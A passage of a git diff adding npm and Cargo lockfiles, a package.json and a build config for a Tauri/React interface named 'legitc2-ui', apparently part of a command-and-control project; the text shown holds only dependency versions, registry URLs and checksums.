"version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", + "license": "MIT" + }, + "node_modules/jsesc": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.1.0.tgz", + "integrity": "sha512-/sM3dO2FOzXjKQhJuo0Q173wf2KOo8t4I8vHy6lF9poUp7bKT0/NHE8fPX23PwfhnykfqnC2xRxOnVw5XuGIaA==", + "dev": true, + "license": "MIT", + "bin": { + "jsesc": "bin/jsesc" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/json5": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", + "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", + "dev": true, + "license": "MIT", + "bin": { + "json5": "lib/cli.js" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/loose-envify": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz", + "integrity": "sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q==", + "license": "MIT", + "dependencies": { + "js-tokens": "^3.0.0 || ^4.0.0" + }, + "bin": { + "loose-envify": "cli.js" + } + }, + "node_modules/lru-cache": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", + "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", + "dev": true, + "license": "ISC", + "dependencies": { + "yallist": "^3.0.2" + } + }, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/mime-db": { + "version": "1.52.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", + "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", + "license": "MIT", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mime-types": { + "version": "2.1.35", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", + "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", + "license": "MIT", + "dependencies": { + "mime-db": "1.52.0" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "dev": true, + "license": "MIT" + }, + "node_modules/nanoid": { + "version": "3.3.12", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.12.tgz", + "integrity": "sha512-ZB9RH/39qpq5Vu6Y+NmUaFhQR6pp+M2Xt76XBnEwDaGcVAqhlvxrl3B2bKS5D3NH3QR76v3aSrKaF/Kiy7lEtQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "bin": { + "nanoid": "bin/nanoid.cjs" + }, + "engines": { + "node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1" + } + }, + "node_modules/node-releases": { + "version": "2.0.44", + "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.44.tgz", + "integrity": "sha512-5WUyunoPMsvvEhS8AxHtRzP+oA8UCkJ7YRxatWKjngndhDGLiqEVAQKWjFAiAiuL8zMRGzGSJxFnLetoa43qGQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "dev": true, + "license": "ISC" + }, + "node_modules/postcss": { + "version": "8.5.14", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.5.14.tgz", + "integrity": "sha512-SoSL4+OSEtR99LHFZQiJLkT59C5B1amGO1NzTwj7TT1qCUgUO6hxOvzkOYxD+vMrXBM3XJIKzokoERdqQq/Zmg==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "dependencies": { + "nanoid": "^3.3.11", + "picocolors": "^1.1.1", + "source-map-js": "^1.2.1" + }, + "engines": { + "node": "^10 || ^12 || >=14" + } + }, + "node_modules/proxy-from-env": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-2.1.0.tgz", + "integrity": "sha512-cJ+oHTW1VAEa8cJslgmUZrc+sjRKgAKl3Zyse6+PV38hZe/V6Z14TbCuXcan9F9ghlz4QrFr2c92TNF82UkYHA==", + "license": "MIT", + "engines": { + "node": ">=10" + } + }, + "node_modules/react": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react/-/react-18.3.1.tgz", + "integrity": "sha512-wS+hAgJShR0KhEvPJArfuPVN1+Hz1t0Y6n5jLrGQbkb4urgPE/0Rve+1kMB1v/oWgHgm4WIcV+i7F2pTVj+2iQ==", + "license": "MIT", + "dependencies": { + "loose-envify": "^1.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/react-dom": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-18.3.1.tgz", + "integrity": "sha512-5m4nQKp+rZRb09LNH59GM4BxTh9251/ylbKIbpe7TpGxfJ+9kv6BLkLBXIjjspbgbnIBNqlI23tRnTWT0snUIw==", + "license": "MIT", + "dependencies": { + "loose-envify": "^1.1.0", + "scheduler": "^0.23.2" + }, + "peerDependencies": { + "react": "^18.3.1" + } + }, + "node_modules/react-refresh": { + "version": "0.17.0", + "resolved": "https://registry.npmjs.org/react-refresh/-/react-refresh-0.17.0.tgz", + "integrity": "sha512-z6F7K9bV85EfseRCp2bzrpyQ0Gkw1uLoCel9XBVWPg/TjRj94SkJzUTGfOa4bs7iJvBWtQG0Wq7wnI0syw3EBQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/rollup": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/rollup/-/rollup-4.60.3.tgz", + "integrity": "sha512-pAQK9HalE84QSm4Po3EmWIZPd3FnjkShVkiMlz1iligWYkWQ7wHYd1PF/T7QZ5TVSD6uSTon5gBVMSM4JfBV+A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/estree": "1.0.8" + }, + "bin": { + "rollup": "dist/bin/rollup" + }, + "engines": { + "node": ">=18.0.0", + "npm": ">=8.0.0" + }, + "optionalDependencies": { + "@rollup/rollup-android-arm-eabi": "4.60.3", + "@rollup/rollup-android-arm64": "4.60.3", + "@rollup/rollup-darwin-arm64": "4.60.3", + "@rollup/rollup-darwin-x64": "4.60.3", + "@rollup/rollup-freebsd-arm64": "4.60.3", + "@rollup/rollup-freebsd-x64": "4.60.3", + "@rollup/rollup-linux-arm-gnueabihf": "4.60.3", + "@rollup/rollup-linux-arm-musleabihf": "4.60.3", + "@rollup/rollup-linux-arm64-gnu": "4.60.3", + "@rollup/rollup-linux-arm64-musl": "4.60.3", + "@rollup/rollup-linux-loong64-gnu": "4.60.3", + "@rollup/rollup-linux-loong64-musl": "4.60.3", + "@rollup/rollup-linux-ppc64-gnu": "4.60.3", + "@rollup/rollup-linux-ppc64-musl": "4.60.3", + "@rollup/rollup-linux-riscv64-gnu": "4.60.3", + "@rollup/rollup-linux-riscv64-musl": "4.60.3", + "@rollup/rollup-linux-s390x-gnu": "4.60.3", + "@rollup/rollup-linux-x64-gnu": "4.60.3", + "@rollup/rollup-linux-x64-musl": "4.60.3", + "@rollup/rollup-openbsd-x64": "4.60.3", + "@rollup/rollup-openharmony-arm64": "4.60.3", + "@rollup/rollup-win32-arm64-msvc": "4.60.3", + "@rollup/rollup-win32-ia32-msvc": "4.60.3", + "@rollup/rollup-win32-x64-gnu": "4.60.3", + "@rollup/rollup-win32-x64-msvc": "4.60.3", + "fsevents": "~2.3.2" + } + }, + "node_modules/rollup/node_modules/@rollup/rollup-win32-x64-gnu": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-x64-gnu/-/rollup-win32-x64-gnu-4.60.3.tgz", + "integrity": "sha512-E5Eb5H/DpxaoXH++Qkv28RcUJboMopmdDUALBczvHMf7hNIxaDZqwY5lK12UK1BHacSmvupoEWGu+n993Z0y1A==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/scheduler": { + "version": "0.23.2", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.23.2.tgz", + "integrity": "sha512-UOShsPwz7NrMUqhR6t0hWjFduvOzbtv7toDH1/hIrfRNIDBnnBWd0CwJTGvTpngVlmwGCdP9/Zl/tVrDqcuYzQ==", + "license": "MIT", + "dependencies": { + "loose-envify": "^1.1.0" + } + }, + "node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/source-map-js": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz", + "integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==", + "dev": true, + "license": "BSD-3-Clause", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/update-browserslist-db": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.2.3.tgz", + "integrity": "sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "dependencies": { + "escalade": "^3.2.0", + "picocolors": "^1.1.1" + }, + "bin": { + "update-browserslist-db": "cli.js" + }, + "peerDependencies": { + "browserslist": ">= 4.21.0" + } + }, + "node_modules/use-sync-external-store": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/use-sync-external-store/-/use-sync-external-store-1.6.0.tgz", + "integrity": "sha512-Pp6GSwGP/NrPIrxVFAIkOQeyw8lFenOHijQWkUTrDvrF4ALqylP2C/KCkeS9dpUM3KvYRQhna5vt7IL95+ZQ9w==", + "license": "MIT", + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0" + } + }, + "node_modules/vite": { + "version": "5.4.21", + "resolved": "https://registry.npmjs.org/vite/-/vite-5.4.21.tgz", + "integrity": "sha512-o5a9xKjbtuhY6Bi5S3+HvbRERmouabWbyUcpXXUA1u+GNUKoROi9byOJ8M0nHbHYHkYICiMlqxkg1KkYmm25Sw==", + "dev": true, + "license": "MIT", + "dependencies": { + "esbuild": "^0.21.3", + "postcss": "^8.4.43", + "rollup": "^4.20.0" + }, + "bin": { + "vite": "bin/vite.js" + }, + "engines": { + "node": "^18.0.0 || >=20.0.0" + }, + "funding": { + "url": "https://github.com/vitejs/vite?sponsor=1" + }, + "optionalDependencies": { + "fsevents": "~2.3.3" + }, + "peerDependencies": { + "@types/node": "^18.0.0 || >=20.0.0", + "less": "*", + "lightningcss": "^1.21.0", + "sass": "*", + "sass-embedded": "*", + "stylus": "*", + "sugarss": "*", + "terser": "^5.4.0" + }, + "peerDependenciesMeta": { + "@types/node": { + "optional": true + }, + "less": { + "optional": true + }, + "lightningcss": { + "optional": true + }, + "sass": { + "optional": true + }, + "sass-embedded": { + "optional": true + }, + "stylus": { + "optional": true + }, + "sugarss": { + "optional": true + }, + "terser": { + "optional": true + } + } + }, + "node_modules/yallist": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", + "dev": true, + "license": "ISC" + }, + "node_modules/zustand": { + "version": "4.5.7", + "resolved": "https://registry.npmjs.org/zustand/-/zustand-4.5.7.tgz", + "integrity": "sha512-CHOUy7mu3lbD6o6LJLfllpjkzhHXSBlX8B9+qPddUsIfeF5S/UZ5q0kmCsnRqT1UHFQZchNFDDzMbQsuesHWlw==", + "license": "MIT", + "dependencies": { + "use-sync-external-store": "^1.2.2" + }, + "engines": { + "node": ">=12.7.0" + }, + "peerDependencies": { + "@types/react": ">=16.8", + "immer": ">=9.0.6", + "react": ">=16.8" + }, + "peerDependenciesMeta": { + "@types/react": { + "optional": true + }, + "immer": { + "optional": true + }, + "react": { + "optional": true + } + } + } + } +} diff --git a/ui/package.json b/ui/package.json new file mode 100644 index 0000000..bb9167c --- /dev/null +++ b/ui/package.json @@ -0,0 +1,30 @@ +{ + "name": "legitc2-ui", + "version": "1.0.0", + "private": true, + "type": "module", + "scripts": { + "dev": "vite", + "build": "vite build", + "preview": "vite preview", + "tauri": "cargo tauri", + "tauri:dev": "cargo tauri dev", + "tauri:build": "cargo tauri build" + }, + "dependencies": { + "@tauri-apps/api": "^2.11.0", + "@xterm/addon-fit": "^0.9.0", + "@xterm/xterm": "^5.3.0", + "axios": "^1.6.8", + "react": "^18.2.0", + "react-dom": "^18.2.0", + "zustand": "^4.5.2" + }, + "devDependencies": { + "@tauri-apps/cli": "^2.11.1", + "@types/react": "^18.2.66", + "@types/react-dom": "^18.2.22", + "@vitejs/plugin-react": "^4.2.1", + "vite": "^5.2.0" + } +} diff --git a/ui/public/favicon.png b/ui/public/favicon.png new file mode 100644 index 0000000..fabbf49 Binary files /dev/null and b/ui/public/favicon.png differ diff --git a/ui/src-tauri/.cargo/config.toml b/ui/src-tauri/.cargo/config.toml new file mode 100644 index 0000000..3693202 --- /dev/null +++ b/ui/src-tauri/.cargo/config.toml @@ -0,0 +1,2 @@ +[build] +target-dir = "D:\\rust-target\\khaos-c2" diff --git a/ui/src-tauri/Cargo.lock b/ui/src-tauri/Cargo.lock new file mode 100644 index 0000000..c54e833 --- /dev/null +++ b/ui/src-tauri/Cargo.lock @@ -0,0 +1,4594 @@ +# This file is automatically @generated by Cargo. +# It is not intended for manual editing. +version = 4 + +[[package]] +name = "adler2" +version = "2.0.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "320119579fcad9c21884f5c4861d16174d0e06250625266f50fe6898340abefa" + +[[package]] +name = "aho-corasick" +version = "1.1.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ddd31a130427c27518df266943a5308ed92d4b226cc639f5a8f1002816174301" +dependencies = [ + "memchr", +] + +[[package]] +name = "alloc-no-stdlib" +version = "2.0.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cc7bb162ec39d46ab1ca8c77bf72e890535becd1751bb45f64c597edb4c8c6b3" + +[[package]] +name = "alloc-stdlib" +version = "0.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "94fb8275041c72129eb51b7d0322c29b8387a0386127718b096429201a5d6ece" +dependencies = [ + "alloc-no-stdlib", +] + +[[package]] +name = "android_system_properties" +version = "0.1.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "819e7219dbd41043ac279b19830f2efc897156490d7fd6ea916720117ee66311" +dependencies = [ + "libc", +] + +[[package]] +name = "anyhow" +version = "1.0.102" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c" + +[[package]] +name = "atk" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "241b621213072e993be4f6f3a9e4b45f65b7e6faad43001be957184b7bb1824b" +dependencies = [ + "atk-sys", + "glib", + "libc", +] + +[[package]] +name = "atk-sys" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c5e48b684b0ca77d2bbadeef17424c2ea3c897d44d566a1617e7e8f30614d086" +dependencies = [ + "glib-sys", + "gobject-sys", + "libc", + "system-deps", +] + +[[package]] +name = "atomic-waker" +version = "1.1.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1505bd5d3d116872e7271a6d4e16d81d0c8570876c8de68093a09ac269d8aac0" + +[[package]] +name = "autocfg" +version = "1.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8" + +[[package]] +name = "base64" +version = "0.21.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9d297deb1925b89f2ccc13d7635fa0714f12c87adce1c75356b39ca9b7178567" + +[[package]] +name = "base64" +version = "0.22.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "72b3254f16251a8381aa12e40e3c4d2f0199f8c6508fbecb9d91f575e0fbb8c6" + +[[package]] +name = "bit-set" +version = "0.8.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "08807e080ed7f9d5433fa9b275196cfc35414f66a0c79d864dc51a0d825231a3" +dependencies = [ + "bit-vec", +] + +[[package]] +name = "bit-vec" +version = "0.8.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5e764a1d40d510daf35e07be9eb06e75770908c27d411ee6c92109c9840eaaf7" + +[[package]] +name = "bitflags" +version = "1.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a" + +[[package]] +name = "bitflags" +version = "2.11.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c4512299f36f043ab09a583e57bceb5a5aab7a73db1805848e8fef3c9e8c78b3" +dependencies = [ + "serde_core", +] + +[[package]] +name = "block-buffer" +version = "0.10.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3078c7629b62d3f0439517fa394996acacc5cbc91c5a20d8c658e77abd503a71" +dependencies = [ + "generic-array", +] + +[[package]] +name = "block2" +version = "0.6.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cdeb9d870516001442e364c5220d3574d2da8dc765554b4a617230d33fa58ef5" +dependencies = [ + "objc2", +] + +[[package]] +name = "brotli" +version = "8.0.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4bd8b9603c7aa97359dbd97ecf258968c95f3adddd6db2f7e7a5bef101c84560" +dependencies = [ + "alloc-no-stdlib", + "alloc-stdlib", + "brotli-decompressor", +] + +[[package]] +name = "brotli-decompressor" +version = "5.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "874bb8112abecc98cbd6d81ea4fa7e94fb9449648c93cc89aa40c81c24d7de03" +dependencies = [ + "alloc-no-stdlib", + "alloc-stdlib", +] + +[[package]] +name = "bs58" +version = "0.5.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bf88ba1141d185c399bee5288d850d63b8369520c1eafc32a0430b5b6c287bf4" +dependencies = [ + "tinyvec", +] + +[[package]] +name = "bumpalo" +version = "3.20.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5d20789868f4b01b2f2caec9f5c4e0213b41e3e5702a50157d699ae31ced2fcb" + +[[package]] +name = "bytemuck" +version = "1.25.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c8efb64bd706a16a1bdde310ae86b351e4d21550d98d056f22f8a7f7a2183fec" + +[[package]] +name = "byteorder" +version = "1.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b" + +[[package]] +name = "bytes" +version = "1.11.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e748733b7cbc798e1434b6ac524f0c1ff2ab456fe201501e6497c8417a4fc33" +dependencies = [ + "serde", +] + +[[package]] +name = "cairo-rs" +version = "0.18.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8ca26ef0159422fb77631dc9d17b102f253b876fe1586b03b803e63a309b4ee2" +dependencies = [ + "bitflags 2.11.1", + "cairo-sys-rs", + "glib", + "libc", + "once_cell", + "thiserror 1.0.69", +] + +[[package]] +name = "cairo-sys-rs" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "685c9fa8e590b8b3d678873528d83411db17242a73fccaed827770ea0fedda51" +dependencies = [ + "glib-sys", + "libc", + "system-deps", +] + +[[package]] +name = "camino" +version = "1.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e629a66d692cb9ff1a1c664e41771b3dcaf961985a9774c0eb0bd1b51cf60a48" +dependencies = [ + "serde_core", +] + +[[package]] +name = "cargo-platform" +version = "0.1.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e35af189006b9c0f00a064685c727031e3ed2d8020f7ba284d78cc2671bd36ea" +dependencies = [ + "serde", +] + +[[package]] +name = "cargo_metadata" +version = "0.19.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dd5eb614ed4c27c5d706420e4320fbe3216ab31fa1c33cd8246ac36dae4479ba" +dependencies = [ + "camino", + "cargo-platform", + "semver", + "serde", + "serde_json", + "thiserror 2.0.18", +] + +[[package]] +name = "cargo_toml" +version = "0.22.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "374b7c592d9c00c1f4972ea58390ac6b18cbb6ab79011f3bdc90a0b82ca06b77" +dependencies = [ + "serde", + "toml 0.9.12+spec-1.1.0", +] + +[[package]] +name = "cc" +version = "1.2.62" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1dce859f0832a7d088c4f1119888ab94ef4b5d6795d1ce05afb7fe159d79f98" +dependencies = [ + "find-msvc-tools", + "shlex", +] + +[[package]] +name = "cesu8" +version = "1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6d43a04d8753f35258c91f8ec639f792891f748a1edbd759cf1dcea3382ad83c" + +[[package]] +name = "cfb" +version = "0.7.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d38f2da7a0a2c4ccf0065be06397cc26a81f4e528be095826eee9d4adbb8c60f" +dependencies = [ + "byteorder", + "fnv", + "uuid 1.23.1", +] + +[[package]] +name = "cfg-expr" +version = "0.15.8" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d067ad48b8650848b989a59a86c6c36a995d02d2bf778d45c3c5d57bc2718f02" +dependencies = [ + "smallvec", + "target-lexicon", +] + +[[package]] +name = "cfg-if" +version = "1.0.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9330f8b2ff13f34540b44e946ef35111825727b38d33286ef986142615121801" + +[[package]] +name = "chrono" +version = "0.4.44" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c673075a2e0e5f4a1dde27ce9dee1ea4558c7ffe648f576438a20ca1d2acc4b0" +dependencies = [ + "iana-time-zone", + "num-traits", + "serde", + "windows-link 0.2.1", +] + +[[package]] +name = "combine" +version = "4.6.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ba5a308b75df32fe02788e748662718f03fde005016435c444eea572398219fd" +dependencies = [ + "bytes", + "memchr", +] + +[[package]] +name = "cookie" +version = "0.18.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4ddef33a339a91ea89fb53151bd0a4689cfce27055c291dfa69945475d22c747" +dependencies = [ + "time", + "version_check", +] + +[[package]] +name = "core-foundation" +version = "0.10.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b2a6cd9ae233e7f62ba4e9353e81a88df7fc8a5987b8d445b4d90c879bd156f6" +dependencies = [ + "core-foundation-sys", + "libc", +] + +[[package]] +name = "core-foundation-sys" +version = "0.8.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "773648b94d0e5d620f64f280777445740e61fe701025087ec8b57f45c791888b" + +[[package]] +name = "core-graphics" +version = "0.25.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "064badf302c3194842cf2c5d61f56cc88e54a759313879cdf03abdd27d0c3b97" +dependencies = [ + "bitflags 2.11.1", + "core-foundation", + "core-graphics-types", + "foreign-types", + "libc", +] + +[[package]] +name = "core-graphics-types" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3d44a101f213f6c4cdc1853d4b78aef6db6bdfa3468798cc1d9912f4735013eb" +dependencies = [ + "bitflags 2.11.1", + "core-foundation", + "libc", +] + +[[package]] +name = "cpufeatures" +version = "0.2.17" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "59ed5838eebb26a2bb2e58f6d5b5316989ae9d08bab10e0e6d103e656d1b0280" +dependencies = [ + "libc", +] + +[[package]] +name = "crc32fast" +version = "1.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9481c1c90cbf2ac953f07c8d4a58aa3945c425b7185c9154d67a65e4230da511" +dependencies = [ + "cfg-if", +] + +[[package]] +name = "crossbeam-channel" +version = "0.5.15" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "82b8f8f868b36967f9606790d1903570de9ceaf870a7bf9fbbd3016d636a2cb2" +dependencies = [ + "crossbeam-utils", +] + +[[package]] +name = "crossbeam-utils" +version = "0.8.21" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d0a5c400df2834b80a4c3327b3aad3a4c4cd4de0629063962b03235697506a28" + +[[package]] +name = "crypto-common" +version = "0.1.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "78c8292055d1c1df0cce5d180393dc8cce0abec0a7102adb6c7b1eef6016d60a" +dependencies = [ + "generic-array", + "typenum", +] + +[[package]] +name = "cssparser" +version = "0.36.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dae61cf9c0abb83bd659dab65b7e4e38d8236824c85f0f804f173567bda257d2" +dependencies = [ + "cssparser-macros", + "dtoa-short", + "itoa", + "phf", + "smallvec", +] + +[[package]] +name = "cssparser-macros" +version = "0.6.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "13b588ba4ac1a99f7f2964d24b3d896ddc6bf847ee3855dbd4366f058cfcd331" +dependencies = [ + "quote", + "syn 2.0.117", +] + +[[package]] +name = "ctor" +version = "0.8.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "352d39c2f7bef1d6ad73db6f5160efcaed66d94ef8c6c573a8410c00bf909a98" +dependencies = [ + "ctor-proc-macro", + "dtor", +] + +[[package]] +name = "ctor-proc-macro" +version = "0.0.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "52560adf09603e58c9a7ee1fe1dcb95a16927b17c127f0ac02d6e768a0e25bc1" + +[[package]] +name = "darling" +version = "0.23.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "25ae13da2f202d56bd7f91c25fba009e7717a1e4a1cc98a76d844b65ae912e9d" +dependencies = [ + "darling_core", + "darling_macro", +] + +[[package]] +name = "darling_core" +version = "0.23.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9865a50f7c335f53564bb694ef660825eb8610e0a53d3e11bf1b0d3df31e03b0" +dependencies = [ + "ident_case", + "proc-macro2", + "quote", + "strsim", + "syn 2.0.117", +] + +[[package]] +name = "darling_macro" +version = "0.23.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac3984ec7bd6cfa798e62b4a642426a5be0e68f9401cfc2a01e3fa9ea2fcdb8d" +dependencies = [ + "darling_core", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "dbus" +version = "0.9.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b942602992bb7acfd1f51c49811c58a610ef9181b6e66f3e519d79b540a3bf73" +dependencies = [ + "libc", + "libdbus-sys", + "windows-sys 0.61.2", +] + +[[package]] +name = "deranged" +version = "0.5.8" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 